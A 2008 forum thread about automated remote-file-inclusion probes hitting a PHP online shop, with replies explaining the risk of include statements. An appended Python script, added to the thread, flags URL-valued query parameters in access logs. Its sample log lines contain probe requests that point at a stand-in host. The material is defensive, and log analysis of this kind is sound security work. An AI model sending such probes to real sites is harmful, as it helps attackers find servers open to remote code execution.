Is this hack working ?


phelum
03-16-2008, 07:53 AM
For the last few months one of my clients' sites has been attacked by robots (different URLs). I can't see that these attacks are working but I could be missing something.

The site has an online shop (PHP) and it looks like the requests are trying to get the server to access external sites because these requests contain URLs where a page name or product name or manufacturer name is expected.

An example from the server log is at http://phelum.net/temp/shop_log.txt. The shop is at http://belbinvideo.com/shop/.

Does anybody know what the robots are trying to do here and are they having any success ?

Razgo
03-16-2008, 08:23 AM
To me it looks normal. It looks like a log file that is showing what happens when people browse the site. "get" is like the SQL query the site makes when you click on something in the php shop.

phelum
03-16-2008, 05:28 PM
> To me it looks normal. It looks like a log file that is showing what happens when people browse the site. "get" is like the SQL query the site makes when you click on something in the php shop.

I understand HTTP GET but the devil is in the detail in this log file. One example is that the remote site is trying to get an invalid page by including the suspect query string in the GET. Instead of the string specifying a valid page it is specifying a full URL which is probably some page the hacker can monitor to see if the shop software is requesting it. This looks like they are testing for a hole but I can't see the value here.

Jason Tokoph
03-16-2008, 06:20 PM
Look in the file that is being called and see where the $page variable is being used. If it is in an include statement then you will have problems and remote code will be executed.

EDIT: nvm, it is for sure someone looking for holes in your script, but it looks like it is completely automated. It will pass a URL into every GET parameter it sees. If "Just a test" is printed on the page, they know your site has a hole. That's when damage occurs. Just keep a watch for any sketchy files 'appearing' on your site.

phelum
03-16-2008, 06:37 PM
> Look in the file that is being called and see where the $page variable is being used. If it is in an include statement then you will have problems and remote code will be executed.

I have a script that checks for recent file changes so I will check the account. Every case where I checked these hacks always results in the default page being returned and this is why I think it is safe. But the GETs from the robots are trying wacky things such as multiple '&'s probably to try and confuse the parse logic. I am a bit worried however because these attacks are occurring on a daily basis so maybe they are getting somewhere.

I take your point about 'include' being a possible weak point so I will search further.

Update: I've just checked the account and the only changed files are the PHP session files.
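
A way to pull the probes discussed in this thread out of an access log, as an added example that is not part of the original posts: it flags every query parameter whose decoded value is an absolute URL and lists which parameters each client swept. The log lines, host names and addresses are constructed, and the Apache combined log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (Apache combined format assumed; not taken from the thread's log).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Mar/2008:07:01:12 +0000] "GET /shop/index.php?page=http://probe.example/test.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.7 - - [16/Mar/2008:07:01:13 +0000] "GET /shop/index.php?manufacturer=3&&&product=http%3A%2F%2Fprobe.example%2Ftest.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.20 - - [16/Mar/2008:07:02:40 +0000] "GET /shop/index.php?page=cart&product=42 HTTP/1.1" 200 7340 "http://shop.example/shop/" "Mozilla/5.0"
"""

# client, method, request target, status, response size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
# A value that starts with scheme:// where a page or product name is expected.
URL_VALUE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def find_url_params(log_text):
    """Return one finding per query parameter whose value is an absolute URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, method, target, status, size = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values and skips the empty pairs that
        # repeated '&' separators produce, so encoded probes are caught too.
        for name, value in parse_qsl(parts.query):
            if URL_VALUE_RE.match(value):
                findings.append({"ip": ip, "method": method, "path": parts.path,
                                 "param": name, "value": value,
                                 "status": int(status), "bytes": size})
    return findings


def probes_by_client(findings):
    """Map each client address to the sorted list of parameters it probed."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["ip"]].add(f["param"])
    return {ip: sorted(params) for ip, params in seen.items()}


if __name__ == "__main__":
    for f in find_url_params(SAMPLE_LOG):
        print(f["ip"], f["path"], f["param"], f["value"], f["status"], f["bytes"])
```

Each parameter name this reports is a place to check in the PHP source for the include usage mentioned above.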